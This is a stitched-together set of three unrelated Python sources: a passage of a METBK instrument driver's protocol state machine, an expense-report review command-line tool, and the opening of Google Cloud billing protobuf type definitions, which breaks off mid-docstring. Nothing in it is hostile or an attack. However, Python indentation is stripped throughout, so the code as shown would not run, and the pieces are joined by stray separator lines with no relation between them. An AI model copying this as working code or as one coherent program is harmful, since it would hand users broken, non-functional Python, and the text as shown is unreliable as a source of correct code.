#Construct superclass.
SingleConnectionInstrumentDriver.__init__(self, evt_callback)
########################################################################
# Superclass overrides for resource query.
########################################################################
def get_resource_params(self):
"""
Return list of device parameters available.
"""
return Parameter.list()
########################################################################
# Protocol builder.
########################################################################
def _build_protocol(self):
"""
Construct the driver protocol state machine.
"""
self._protocol = Protocol(Prompt, NEWLINE, self._driver_event)
###########################################################################
# Protocol
###########################################################################
class Protocol(CommandResponseInstrumentProtocol):
"""
Instrument protocol class
Subclasses CommandResponseInstrumentProtocol
"""
last_sample = ''
def __init__(self, prompts, newline, driver_event):
"""
Protocol constructor.
@param prompts A BaseEnum class containing instrument prompts.
@param newline The newline.
@param driver_event Driver process event callback.
"""
# Construct protocol superclass.
CommandResponseInstrumentProtocol.__init__(self, prompts, newline, driver_event)
# Build protocol state machine.
self._protocol_fsm = ThreadSafeFSM(ProtocolState, ProtocolEvent, ProtocolEvent.ENTER, ProtocolEvent.EXIT)
# Add event handlers for protocol state machine.
self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.ENTER, self._handler_unknown_enter)
self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.EXIT, self._handler_unknown_exit)
self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.DISCOVER, self._handler_unknown_discover)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ENTER, self._handler_command_enter)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.EXIT, self._handler_command_exit)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ACQUIRE_SAMPLE, self._handler_acquire_sample)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.START_DIRECT, self._handler_command_start_direct)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.CLOCK_SYNC, self._handler_command_sync_clock)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.GET, self._handler_get)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.SET, self._handler_command_set)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.START_AUTOSAMPLE, self._handler_command_start_autosample)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.FLASH_STATUS, self._handler_flash_status)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ACQUIRE_STATUS, self._handler_acquire_status)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.ENTER, self._handler_autosample_enter)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.EXIT, self._handler_autosample_exit)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.STOP_AUTOSAMPLE, self._handler_autosample_stop_autosample)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.ACQUIRE_SAMPLE, self._handler_acquire_sample)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.CLOCK_SYNC, self._handler_autosample_sync_clock)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.GET, self._handler_get)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.FLASH_STATUS, self._handler_flash_status)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.ACQUIRE_STATUS, self._handler_acquire_status)
        # We set up a separate state for clock sync so that the state machine
        # disables the autosample scheduler before we try to sync the clock.
        # Otherwise a race condition could be introduced if the scheduler
        # requests a sample while we are syncing the clock.
self._protocol_fsm.add_handler(ProtocolState.SYNC_CLOCK, ProtocolEvent.ENTER, self._handler_sync_clock_enter)
self._protocol_fsm.add_handler(ProtocolState.SYNC_CLOCK, ProtocolEvent.CLOCK_SYNC, self._handler_sync_clock_sync)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.ENTER, self._handler_direct_access_enter)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.EXIT, self._handler_direct_access_exit)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.EXECUTE_DIRECT, self._handler_direct_access_execute_direct)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.STOP_DIRECT, self._handler_direct_access_stop_direct)
# Add build handlers for device commands.
self._add_build_handler(Command.GET_CLOCK, self._build_simple_command)
self._add_build_handler(Command.SET_CLOCK, self._build_set_clock_command)
self._add_build_handler(Command.D, self._build_simple_command)
self._add_build_handler(Command.GO, self._build_simple_command)
self._add_build_handler(Command.STOP, self._build_simple_command)
self._add_build_handler(Command.FS, self._build_simple_command)
self._add_build_handler(Command.STAT, self._build_simple_command)
# Add response handlers for device commands.
self._add_response_handler(Command.GET_CLOCK, self._parse_clock_response)
self._add_response_handler(Command.SET_CLOCK, self._parse_clock_response)
self._add_response_handler(Command.FS, self._parse_fs_response)
self._add_response_handler(Command.STAT, self._parse_common_response)
# Construct the parameter dictionary containing device parameters,
# current parameter values, and set formatting functions.
self._build_param_dict()
self._build_command_dict()
self._build_driver_dict()
self._chunker = StringChunker(Protocol.sieve_function)
self._add_scheduler_event(ScheduledJob.ACQUIRE_STATUS, ProtocolEvent.ACQUIRE_STATUS)
self._add_scheduler_event(ScheduledJob.CLOCK_SYNC, ProtocolEvent.CLOCK_SYNC)
# Start state machine in UNKNOWN state.
self._protocol_fsm.start(ProtocolState.UNKNOWN)
@staticmethod
def sieve_function(raw_data):
"""
Split raw data into sample and status chunks, returning (start, end) spans for each match.
"""
matchers = []
return_list = []
matchers.append(METBK_SampleDataParticle.regex_compiled())
matchers.append(METBK_StatusDataParticle.regex_compiled())
for matcher in matchers:
for match in matcher.finditer(raw_data):
return_list.append((match.start(), match.end()))
return return_list
def _got_chunk(self, chunk, timestamp):
"""
The base class got_data has gotten a chunk from the chunker. Pass it to extract_sample
with the appropriate particle objects and REGEXes.
"""
log.debug("_got_chunk: chunk=%s" %chunk)
self._extract_sample(METBK_SampleDataParticle, METBK_SampleDataParticle.regex_compiled(), chunk, timestamp)
self._extract_sample(METBK_StatusDataParticle, METBK_StatusDataParticle.regex_compiled(), chunk, timestamp)
def _filter_capabilities(self, events):
"""
Return a list of currently available capabilities.
"""
return [x for x in events if Capability.has(x)]
########################################################################
# override methods from base class.
########################################################################
def _extract_sample(self, particle_class, regex, line, timestamp, publish=True):
"""
Overridden to add duplicate-sample checking. The check applies only to sample chunks
and not to other chunk types, so the regex match is performed before the string comparison.
Extract sample from a response line if present and publish parsed particle
@param particle_class The class to instantiate for this specific
data particle. Parameterizing this allows for simple, standard
behavior from this routine
@param regex The regular expression that matches a data sample
@param line string to match for sample.
@param timestamp port agent timestamp to include with the particle
@param publish boolean to publish samples (default True). If True,
two different events are published: one to notify raw data and
the other to notify parsed data.
@retval the parsed sample if the line can be parsed for a sample.
Otherwise, None.
@todo Figure out how the agent wants the results for a single poll
and return them that way from here
"""
match = regex.match(line)
if match:
if particle_class == METBK_SampleDataParticle:
# check to see if there is a delta from last sample, and don't parse this sample if there isn't
if match.group(0) == self.last_sample:
return
# save this sample as last_sample for next check
self.last_sample = match.group(0)
particle = particle_class(line, port_timestamp=timestamp)
parsed_sample = particle.generate()
if publish and self._driver_event:
self._driver_event(DriverAsyncEvent.SAMPLE, parsed_sample)
return parsed_sample
########################################################################
# implement virtual methods from base class.
########################################################################
def apply_startup_params(self):
"""
Apply sample_interval startup parameter.
"""
config = self.get_startup_config()
log.debug("apply_startup_params: startup config = %s" %config)
if Parameter.SAMPLE_INTERVAL in config:
log.debug("apply_startup_params: setting sample_interval to %d" %config[Parameter.SAMPLE_INTERVAL])
self._param_dict.set_value(Parameter.SAMPLE_INTERVAL, config[Parameter.SAMPLE_INTERVAL])
########################################################################
# Unknown handlers.
########################################################################
def _handler_unknown_enter(self, *args, **kwargs):
"""
Enter unknown state.
"""
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
def _handler_unknown_exit(self, *args, **kwargs):
"""
Exit unknown state.
"""
pass
def _handler_unknown_discover(self, *args, **kwargs):
"""
Discover the current state (COMMAND or AUTOSAMPLE) from the instrument's logging status.
@retval (next_state, next_agent_state) tuple.
"""
(protocol_state, agent_state) = self._discover()
# If we are just starting up and we land in command mode then our state should
# be idle
if(agent_state == ResourceAgentState.COMMAND):
agent_state = ResourceAgentState.IDLE
log.debug("_handler_unknown_discover: state = %s", protocol_state)
return (protocol_state, agent_state)
########################################################################
# Clock Sync handlers.
# Not much to do in this state except sync the clock and then transition
# back to autosample. In command mode we don't have to worry about
# stopping the scheduler, so we just sync the clock without any state
# transitions.
########################################################################
def _handler_sync_clock_enter(self, *args, **kwargs):
"""
Enter sync clock state.
"""
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
self._protocol_fsm.on_event(ProtocolEvent.CLOCK_SYNC)
def _handler_sync_clock_sync(self, *args, **kwargs):
"""
Sync the clock
"""
next_state = ProtocolState.AUTOSAMPLE
next_agent_state = ResourceAgentState.STREAMING
result = None
self._sync_clock()
self._async_agent_state_change(ResourceAgentState.STREAMING)
return(next_state,(next_agent_state, result))
########################################################################
# Command handlers.
# implemented only to make direct access possible; the instrument has no true command mode
########################################################################
def _handler_command_enter(self, *args, **kwargs):
"""
Enter command state.
"""
self._init_params()
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
def _handler_command_exit(self, *args, **kwargs):
"""
Exit command state.
"""
pass
def _handler_command_set(self, *args, **kwargs):
"""
No writable parameters, so this does nothing; implemented only to satisfy the framework.
"""
next_state = None
result = None
return (next_state, result)
def _handler_command_start_direct(self, *args, **kwargs):
"""
"""
result = None
next_state = ProtocolState.DIRECT_ACCESS
next_agent_state = ResourceAgentState.DIRECT_ACCESS
return (next_state, (next_agent_state, result))
def _handler_command_start_autosample(self, *args, **kwargs):
"""
"""
result = None
next_state = ProtocolState.AUTOSAMPLE
next_agent_state = ResourceAgentState.STREAMING
self._start_logging()
return (next_state, (next_agent_state, result))
def _handler_command_sync_clock(self, *args, **kwargs):
"""
Sync the clock close to a second edge.
@retval (next_state, (next_agent_state, result)) tuple, (None, (None, None)).
@throws InstrumentTimeoutException if the device does not respond correctly.
@throws InstrumentProtocolException if command could not be built or misunderstood.
"""
next_state = None
next_agent_state = None
result = None
self._sync_clock()
return(next_state,(next_agent_state, result))
########################################################################
# autosample handlers.
########################################################################
def _handler_autosample_enter(self, *args, **kwargs):
"""
Enter autosample state. Because this is an instrument that must be
polled, we need to ensure the scheduler is added when we are in an
autosample state. This scheduler raises events to poll the
instrument for data.
"""
self._init_params()
self._ensure_autosample_config()
self._add_scheduler_event(AUTO_SAMPLE_SCHEDULED_JOB, ProtocolEvent.ACQUIRE_SAMPLE)
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
def _handler_autosample_exit(self, *args, **kwargs):
"""
exit autosample state.
"""
self._remove_scheduler(AUTO_SAMPLE_SCHEDULED_JOB)
def _handler_autosample_stop_autosample(self, *args, **kwargs):
"""
"""
result = None
next_state = ProtocolState.COMMAND
next_agent_state = ResourceAgentState.COMMAND
self._stop_logging()
return (next_state, (next_agent_state, result))
def _handler_autosample_sync_clock(self, *args, **kwargs):
"""
Sync the clock close to a second edge.
@retval (next_state, (next_agent_state, result)) tuple, (None, (None, None)).
@throws InstrumentTimeoutException if the device does not respond correctly.
@throws InstrumentProtocolException if command could not be built or misunderstood.
"""
next_state = ProtocolState.SYNC_CLOCK
next_agent_state = ResourceAgentState.BUSY
result = None
return(next_state,(next_agent_state, result))
########################################################################
# Direct access handlers.
########################################################################
def _handler_direct_access_enter(self, *args, **kwargs):
"""
Enter direct access state.
"""
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
self._sent_cmds = []
def _handler_direct_access_exit(self, *args, **kwargs):
"""
Exit direct access state.
"""
pass
def _handler_direct_access_execute_direct(self, data):
next_state = None
result = None
self._do_cmd_direct(data)
return (next_state, result)
def _handler_direct_access_stop_direct(self):
result = None
(next_state, next_agent_state) = self._discover()
return (next_state, (next_agent_state, result))
########################################################################
# general handlers.
########################################################################
def _handler_flash_status(self, *args, **kwargs):
"""
Acquire flash status from instrument.
@retval (next_state, (next_agent_state, result)) tuple, (None, (None, None)).
@throws InstrumentTimeoutException if device cannot be woken for command.
@throws InstrumentProtocolException if command could not be built or misunderstood.
"""
next_state = None
next_agent_state = None
result = None
result = self._do_cmd_resp(Command.FS, expected_prompt=Prompt.FS)
log.debug("FLASH RESULT: %s", result)
return (next_state, (next_agent_state, result))
def _handler_acquire_sample(self, *args, **kwargs):
"""
Acquire sample from instrument.
@retval (next_state, (next_agent_state, result)) tuple, (None, (None, None)).
@throws InstrumentTimeoutException if device cannot be woken for command.
@throws InstrumentProtocolException if command could not be built or misunderstood.
"""
next_state = None
next_agent_state = None
result = None
result = self._do_cmd_resp(Command.D, *args, **kwargs)
return (next_state, (next_agent_state, result))
def _handler_acquire_status(self, *args, **kwargs):
"""
Acquire status from instrument.
@retval (next_state, (next_agent_state, result)) tuple, (None, (None, None)).
@throws InstrumentTimeoutException if device cannot be woken for command.
@throws InstrumentProtocolException if command could not be built or misunderstood.
"""
next_state = None
next_agent_state = None
result = None
log.debug( "Logging status: %s", self._is_logging())
result = self._do_cmd_resp(Command.STAT, expected_prompt=[Prompt.STOPPED, Prompt.GO])
return (next_state, (next_agent_state, result))
########################################################################
# Private helpers.
########################################################################
def _set_params(self, *args, **kwargs):
"""
Overridden from the base class; used when applying direct-access parameters.
Not needed here, so it is a no-op.
"""
pass
def _discover(self, *args, **kwargs):
"""
Determine the current state from the instrument's logging status.
@retval (protocol_state, agent_state) tuple; UNKNOWN states if the status cannot be determined.
"""
logging = self._is_logging()
if(logging == True):
protocol_state = ProtocolState.AUTOSAMPLE
agent_state = ResourceAgentState.STREAMING
elif(logging == False):
protocol_state = ProtocolState.COMMAND
agent_state = ResourceAgentState.COMMAND
else:
protocol_state = ProtocolState.UNKNOWN
agent_state = ResourceAgentState.ACTIVE_UNKNOWN
return (protocol_state, agent_state)
def _start_logging(self):
"""
Start the instrument logging if it isn't already running.
"""
if(not self._is_logging()):
log.debug("Sending start logging command: %s", Command.GO)
self._do_cmd_resp(Command.GO, expected_prompt=Prompt.GO)
def _stop_logging(self):
"""
Stop the instrument logging if it is running. When the instrument
is in a syncing state we cannot stop logging; we must wait before
we send the stop command.
"""
if(self._is_logging()):
log.debug("Attempting to stop the instrument logging.")
result = self._do_cmd_resp(Command.STOP, expected_prompt=[Prompt.STOPPED, Prompt.SYNC, Prompt.GO])
log.debug("Stop Command Result: %s", result)
# If we are still logging then let's wait until we are not
# syncing before resending the command.
if(self._is_logging()):
self._wait_for_sync()
log.debug("Attempting to stop the instrument again.")
result = self._do_cmd_resp(Command.STOP, expected_prompt=[Prompt.STOPPED, Prompt.SYNC, Prompt.GO])
log.debug("Stop Command Result: %s", result)
def _wait_for_sync(self):
"""
When the instrument is syncing internal parameters we can't stop
logging. So we will watch the logging status and when it is not
synchronizing we will return. Basically we will just block
until we are no longer syncing.
@raise InstrumentProtocolException when we timeout waiting for a
transition.
"""
timeout = time.time() + SYNC_TIMEOUT
while(time.time() < timeout):
result = self._do_cmd_resp(Command.STAT, expected_prompt=[Prompt.STOPPED, Prompt.SYNC, Prompt.GO])
match = LOGGING_SYNC_COMPILED.match(result)
if(match):
log.debug("We are still in sync mode. Wait a bit and retry")
time.sleep(2)
else:
log.debug("Transitioned out of sync.")
return True
# We timed out
raise InstrumentProtocolException("failed to transition out of sync mode")
def _is_logging(self):
"""
Run the status command to determine if we are in command or autosample
mode.
@return: True if sampling, False if not, None if the status cannot be determined
"""
log.debug("_is_logging: start")
result = self._do_cmd_resp(Command.STAT, expected_prompt=[Prompt.STOPPED, Prompt.GO])
log.debug("Checking logging status from %s", result)
match = LOGGING_STATUS_COMPILED.match(result)
if not match:
log.error("Unable to determine logging status from: %s", result)
return None
if match.group(1) == 'GO':
log.debug("Looks like we are logging: %s", match.group(1))
return True
else:
log.debug("Looks like we are NOT logging: %s", match.group(1))
return False
def _ensure_autosample_config(self):
scheduler_config = self._get_scheduler_config()
if (scheduler_config == None):
log.debug("_ensure_autosample_config: adding scheduler element to _startup_config")
self._startup_config[DriverConfigKey.SCHEDULER] = {}
scheduler_config = self._get_scheduler_config()
log.debug("_ensure_autosample_config: adding autosample config to _startup_config")
config = {DriverSchedulerConfigKey.TRIGGER: {
DriverSchedulerConfigKey.TRIGGER_TYPE: TriggerType.INTERVAL,
DriverSchedulerConfigKey.SECONDS: self._param_dict.get(Parameter.SAMPLE_INTERVAL)}}
self._startup_config[DriverConfigKey.SCHEDULER][AUTO_SAMPLE_SCHEDULED_JOB] = config
if(not self._scheduler):
self.initialize_scheduler()
def _sync_clock(self, *args, **kwargs):
"""
Sync the instrument clock close to a second edge.
@throws InstrumentTimeoutException if the device does not respond correctly.
@throws InstrumentProtocolException if command could not be built or misunderstood.
"""
next_state = None
next_agent_state = None
result = None
time_format = "%Y/%m/%d %H:%M:%S"
str_val = get_timestamp_delayed(time_format)
log.debug("Setting instrument clock to '%s'", str_val)
self._do_cmd_resp(Command.SET_CLOCK, str_val, expected_prompt=Prompt.CR_NL)
def _wakeup(self, timeout):
"""There is no wakeup sequence for this instrument"""
pass
def _build_driver_dict(self):
"""
Populate the driver dictionary with options
"""
self._driver_dict.add(DriverDictKey.VENDOR_SW_COMPATIBLE, False)
def _build_command_dict(self):
"""
Populate the command dictionary with command.
"""
self._cmd_dict.add(Capability.START_AUTOSAMPLE, display_name="Start Autosample")
self._cmd_dict.add(Capability.STOP_AUTOSAMPLE, display_name="Stop Autosample")
self._cmd_dict.add(Capability.CLOCK_SYNC, display_name="Synchronize Clock")
self._cmd_dict.add(Capability.ACQUIRE_STATUS, display_name="Acquire Status")
self._cmd_dict.add(Capability.ACQUIRE_SAMPLE, display_name="Acquire Sample")
self._cmd_dict.add(Capability.FLASH_STATUS, display_name="Flash Status")
def _build_param_dict(self):
"""
Populate the parameter dictionary with XR-420 parameters.
For each parameter key add value formatting function for set commands.
"""
# The parameter dictionary.
self._param_dict = ProtocolParameterDict()
# Add parameter handlers to parameter dictionary for instrument configuration parameters.
self._param_dict.add(Parameter.CLOCK,
r'(.*)\r\n',
lambda match : match.group(1),
lambda string : str(string),
type=ParameterDictType.STRING,
display_name="clock",
expiration=0,
visibility=ParameterDictVisibility.READ_ONLY)
self._param_dict.add(Parameter.SAMPLE_INTERVAL,
r'Not used. This parameter is not parsed from instrument response',
None,
self._int_to_string,
type=ParameterDictType.INT,
default_value=30,
value=30,
startup_param=True,
display_name="sample_interval",
visibility=ParameterDictVisibility.IMMUTABLE)
def _update_params(self, *args, **kwargs):
"""
Update the parameter dictionary.
"""
log.debug("_update_params:")
# Issue clock command and parse results.
# This is the only parameter and it is always changing so don't bother with the 'change' event
self._do_cmd_resp(Command.GET_CLOCK)
def _build_set_clock_command(self, cmd, val):
"""
Build handler for set clock command (cmd=val followed by newline).
@param cmd the string for setting the clock (this should equal #CLOCK=).
@param val the parameter value to set.
@retval The set command to be sent to the device.
"""
cmd = '%s%s' %(cmd, val) + NEWLINE
return cmd
def _parse_clock_response(self, response, prompt):
"""
Parse handler for clock command.
@param response command response string.
@param prompt prompt following command response.
@throws InstrumentProtocolException if clock command misunderstood.
"""
log.debug("_parse_clock_response: response=%s, prompt=%s" %(response, prompt))
if prompt not in [Prompt.CR_NL]:
raise InstrumentProtocolException('CLOCK command not recognized: %s.' % response)
if not self._param_dict.update(response):
raise InstrumentProtocolException('CLOCK command not parsed: %s.' % response)
return
def _parse_fs_response(self, response, prompt):
"""
Parse handler for FS command.
@param response command response string.
@param prompt prompt following command response.
@throws InstrumentProtocolException if FS command misunderstood.
"""
log.debug("_parse_fs_response: response=%s, prompt=%s" %(response, prompt))
if prompt not in [Prompt.FS]:
raise InstrumentProtocolException('FS command not recognized: %s.' % response)
return response
def _parse_common_response(self, response, prompt):
"""
Parse handler for common commands.
@param response command response string.
@param prompt prompt following command response.
"""
return response
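# --- Hedged sketch (standalone; not part of the driver above). It illustrates how a
# sieve function of this shape is typically used: regexes locate sample/status chunks
# in a raw buffer and their (start, end) spans are handed to the chunker, which then
# calls _got_chunk() for each span. The regexes and buffer below are hypothetical
# placeholders, not the METBK particle formats.
if __name__ == '__main__':
    import re

    sample_re = re.compile(r'SAMPLE:[^\r\n]*\r\n')
    status_re = re.compile(r'STATUS:[^\r\n]*\r\n')

    def demo_sieve(raw_data):
        # Mirror Protocol.sieve_function: collect spans of every recognized chunk.
        spans = []
        for matcher in (sample_re, status_re):
            for match in matcher.finditer(raw_data):
                spans.append((match.start(), match.end()))
        return spans

    buffer = 'noiseSAMPLE:1.0 2.0 3.0\r\nmore noiseSTATUS:ok\r\n'
    for start, end in demo_sieve(buffer):
        print(buffer[start:end].strip())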
|
|
import csv
import optparse
import os
import textwrap
import sys
from .. import NoSuchReport
from .. import approve_report
from .. import get_report_info
from .. import initialize_gcloud
from .. import list_reports
from .. import reject_report
class InvalidCommandLine(ValueError):
pass
class NotACommand(object):
def __init__(self, bogus):
self.bogus = bogus
def __call__(self):
raise InvalidCommandLine('Not a command: %s' % self.bogus)
def _get_csv(args):
try:
csv_file, = args
except ValueError:
raise InvalidCommandLine('Specify one CSV file')
csv_file = os.path.abspath(os.path.normpath(csv_file))
if not os.path.exists(csv_file):
raise InvalidCommandLine('Invalid CSV file: %s' % csv_file)
with open(csv_file) as f:
return csv_file, list(csv.DictReader(f))
class ListReports(object):
"""List expense reports according to specified criteria.
"""
def __init__(self, submitter, *args):
self.submitter = submitter
args = list(args)
parser = optparse.OptionParser(
usage="%prog [OPTIONS]")
parser.add_option(
'-e', '--employee-id',
action='store',
dest='employee_id',
default=None,
help="ID of the employee whose expense reports to list")
parser.add_option(
'-s', '--status',
action='store',
dest='status',
default=None,
help="Status of expense reports to list")
options, args = parser.parse_args(args)
self.employee_id = options.employee_id
self.status = options.status
def __call__(self):
_cols = [
('employee_id', 'Employee ID'),
('report_id', 'Report ID'),
('created', 'Created'),
('updated', 'Updated'),
('description', 'Description'),
('status', 'Status'),
('memo', 'Memo'),
]
writer = csv.writer(sys.stdout)
writer.writerow([x[1] for x in _cols])
for report in list_reports(self.employee_id, self.status):
writer.writerow([report[x[0]] for x in _cols])
class ShowReport(object):
"""Dump the contents of a given expense report.
"""
def __init__(self, submitter, *args):
self.submitter = submitter
args = list(args)
parser = optparse.OptionParser(
usage="%prog [OPTIONS] EMPLOYEE_ID REPORT_ID")
_, args = parser.parse_args(args)
try:
self.employee_id, self.report_id, = args
except ValueError:
raise InvalidCommandLine('Specify employee ID, report ID')
def __call__(self):
_cols = ['Date', 'Vendor', 'Type', 'Quantity', 'Price', 'Memo']
try:
info = get_report_info(self.employee_id, self.report_id)
except NoSuchReport:
self.submitter.blather("No such report: %s/%s"
% (self.employee_id, self.report_id))
else:
self.submitter.blather("Employee-ID: %s" % info['employee_id'])
self.submitter.blather("Report-ID: %s" % info['report_id'])
self.submitter.blather("Report-Status: %s" % info['status'])
self.submitter.blather("Created: %s" % info['created'])
self.submitter.blather("Updated: %s" % info['updated'])
self.submitter.blather("Description: %s" % info['description'])
self.submitter.blather("")
writer = csv.writer(sys.stdout)
writer.writerow([x for x in _cols])
for item in info['items']:
writer.writerow([item[x] for x in _cols])
class ApproveReport(object):
"""Approve a given expense report.
"""
def __init__(self, submitter, *args):
self.submitter = submitter
args = list(args)
parser = optparse.OptionParser(
usage="%prog [OPTIONS] EMPLOYEE_ID REPORT_ID")
parser.add_option(
'-c', '--check-number',
action='store',
dest='check_number',
default='',
help="Check number issued to pay the expense report")
options, args = parser.parse_args(args)
try:
self.employee_id, self.report_id, = args
except ValueError:
raise InvalidCommandLine('Specify employee ID, report ID')
self.check_number = options.check_number
def __call__(self):
approve_report(self.employee_id, self.report_id, self.check_number)
memo = ('' if not self.check_number else
', check #%s' % self.check_number)
self.submitter.blather("Approved report: %s/%s%s" %
(self.employee_id, self.report_id, memo))
class RejectReport(object):
"""Reject a given expense report.
"""
def __init__(self, submitter, *args):
self.submitter = submitter
args = list(args)
parser = optparse.OptionParser(
usage="%prog [OPTIONS] EMPLOYEE_ID REPORT_ID")
parser.add_option(
'-r', '--reason',
action='store',
dest='reason',
default=None,
help="Reason for rejecting the expense report")
options, args = parser.parse_args(args)
try:
self.employee_id, self.report_id, = args
except ValueError:
raise InvalidCommandLine('Specify employee ID, report ID')
self.reason = options.reason
def __call__(self):
reject_report(self.employee_id, self.report_id, self.reason)
memo = ('' if self.reason is None else ', reason: %s' % self.reason)
self.submitter.blather("Rejected report: %s/%s%s" %
(self.employee_id, self.report_id, memo))
_COMMANDS = {
'list': ListReports,
'show': ShowReport,
'approve': ApproveReport,
'reject': RejectReport,
}
def get_description(command):
klass = _COMMANDS[command]
doc = getattr(klass, '__doc__', '')
if doc is None:
return ''
return ' '.join([x.lstrip() for x in doc.split('\n')])
class ReviewExpenses(object):
""" Driver for the :command:`review_expenses` command-line script.
"""
def __init__(self, argv=None, logger=None):
self.commands = []
if logger is None:
logger = self._print
self.logger = logger
self.parse_arguments(argv)
def parse_arguments(self, argv=None):
""" Parse subcommands and their options from an argv list.
"""
# Global options (not bound to sub-command)
mine = []
queue = [(None, mine)]
def _recordCommand(arg):
if arg is not None:
queue.append((arg, []))
for arg in argv:
if arg in _COMMANDS:
_recordCommand(arg)
else:
queue[-1][1].append(arg)
_recordCommand(None)
usage = ("%prog [GLOBAL_OPTIONS] "
"[command [COMMAND_OPTIONS]* [COMMAND_ARGS]]")
parser = optparse.OptionParser(usage=usage)
parser.add_option(
'-s', '--help-commands',
action='store_true',
dest='help_commands',
help="Show command help")
parser.add_option(
'-q', '--quiet',
action='store_const', const=0,
dest='verbose',
help="Run quietly")
parser.add_option(
'-v', '--verbose',
action='count',
dest='verbose',
default=1,
help="Increase verbosity")
options, args = parser.parse_args(mine)
self.options = options
for arg in args:
self.commands.append(NotACommand(arg))
options.help_commands = True
if options.help_commands:
keys = sorted(_COMMANDS.keys())
self.error('Valid commands are:')
for x in keys:
self.error(' %s' % x)
doc = get_description(x)
if doc:
self.error(textwrap.fill(doc,
initial_indent=' ',
subsequent_indent=' '))
return
for command_name, args in queue:
if command_name is not None:
command = _COMMANDS[command_name](self, *args)
self.commands.append(command)
def __call__(self):
""" Invoke sub-commands parsed by :meth:`parse_arguments`.
"""
if not self.commands:
raise InvalidCommandLine('No commands specified')
for command in self.commands:
command()
def _print(self, text): # pragma NO COVERAGE
sys.stdout.write('%s\n' % text)
def error(self, text):
self.logger(text)
def blather(self, text, min_level=1):
if self.options.verbose >= min_level:
self.logger(text)
def main(argv=sys.argv[1:]):
initialize_gcloud()
try:
ReviewExpenses(argv)()
except InvalidCommandLine as e: # pragma NO COVERAGE
sys.stdout.write('%s\n' % (str(e)))
sys.exit(1)
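# --- Hedged sketch (standalone; not used by the module above). It illustrates the
# argv-grouping idea behind ReviewExpenses.parse_arguments: leading global options,
# then one (command, args) group per recognized command name. The helper name is an
# assumption for illustration only.
def _group_argv(argv, commands=('list', 'show', 'approve', 'reject')):
    global_args = []
    groups = [(None, global_args)]
    for arg in argv:
        if arg in commands:
            groups.append((arg, []))
        else:
            groups[-1][1].append(arg)
    return global_args, groups[1:]

if __name__ == '__main__':
    # ['-v', 'list', '-e', '42', 'show', '42', '7'] splits into global ['-v'],
    # then ('list', ['-e', '42']) and ('show', ['42', '7']).
    print(_group_argv(['-v', 'list', '-e', '42', 'show', '42', '7']))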
|
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from google.type import money_pb2 # type: ignore
__protobuf__ = proto.module(
package="google.cloud.billing.v1",
manifest={
"Service",
"Sku",
"Category",
"PricingInfo",
"PricingExpression",
"AggregationInfo",
"ListServicesRequest",
"ListServicesResponse",
"ListSkusRequest",
"ListSkusResponse",
},
)
class Service(proto.Message):
r"""Encapsulates a single service in Google Cloud Platform.
Attributes:
name (str):
The resource name for the service.
Example: "services/DA34-426B-A397".
service_id (str):
The identifier for the service.
Example: "DA34-426B-A397".
display_name (str):
A human readable display name for this
service.
business_entity_name (str):
The business under which the service is
offered. Ex. "businessEntities/GCP",
"businessEntities/Maps".
"""
name = proto.Field(proto.STRING, number=1,)
service_id = proto.Field(proto.STRING, number=2,)
display_name = proto.Field(proto.STRING, number=3,)
business_entity_name = proto.Field(proto.STRING, number=4,)
class Sku(proto.Message):
r"""Encapsulates a single SKU in Google Cloud Platform
Attributes:
name (str):
The resource name for the SKU.
Example:
"services/DA34-426B-A397/skus/AA95-CD31-42FE".
sku_id (str):
The identifier for the SKU.
Example: "AA95-CD31-42FE".
description (str):
A human readable description of the SKU, has
a maximum length of 256 characters.
category (google.cloud.billing_v1.types.Category):
The category hierarchy of this SKU, purely
for organizational purpose.
service_regions (Sequence[str]):
List of service regions this SKU is offered
at. Example: "asia-east1"
Service regions can be found at
